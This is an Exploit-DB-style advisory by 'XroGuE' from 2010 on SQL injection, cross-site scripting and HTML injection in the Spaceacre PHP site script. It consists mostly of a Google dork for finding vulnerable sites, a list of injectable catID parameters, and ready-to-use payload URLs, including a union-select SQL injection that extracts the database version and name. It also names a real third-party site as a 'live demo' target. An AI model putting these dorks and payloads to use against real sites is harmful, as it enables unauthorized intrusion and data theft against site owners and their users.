Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection

EDB-ID:

12746

CVE:

N/A


Author:

XroGuE

Type:

webapps


Platform:

PHP

Date:

2010-05-26


=========================================================
Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
=========================================================
#########################################
# Name: Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
# Vendor: http://www.spaceacre.com
# Date: 2010-05-26
# Author: XroGuE
# Thanks to: Inj3ct0r.com [R0073r],Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
##########################################

[+] Dork: intext:"Designed by Spaceacre"

[+] Vulnerabilities:

#http://[target]/cat1.php?catID=[SQL/XSS/HTML]
#http://[target]/cat2.php?catID=[SQL/XSS/HTML]
#http://[target]/cat3.php?catID=[SQL/XSS/HTML]
#http://[target]/cat4.php?catID=[SQL/XSS/HTML]
#http://[target]/cat5.php?catID=[SQL/XSS/HTML]
#http://[target]/cat6.php?catID=[SQL/XSS/HTML]


[+] XSS InjecTion Vulnerability:

[+] Live Demo: http://www.baselinengn.com/cat1.php?catID=
http://server/cat2.php?catID=
http://server/cat3.php?catID=
http://server/cat4.php?catID=

###########################################

[+] HTML InjecTion Vulnerability:

[+] Live Demo: http://www.baselinengn.com/cat1.php?catID=<font color=red size=15>XroGuE</font>
http://server/cat2.php?catID=<font color=red size=15>XroGuE</font>
http://server/cat3.php?catID=<font color=red size=15>XroGuE</font>
http://server/cat4.php?catID=<font color=red size=15>XroGuE</font>

###########################################

[+] SQL InjecTion Vulnerability:

[+] Live Demo : http://server/cat1.php?catID=-999+union+all+select+1,version(),database()--

###########################################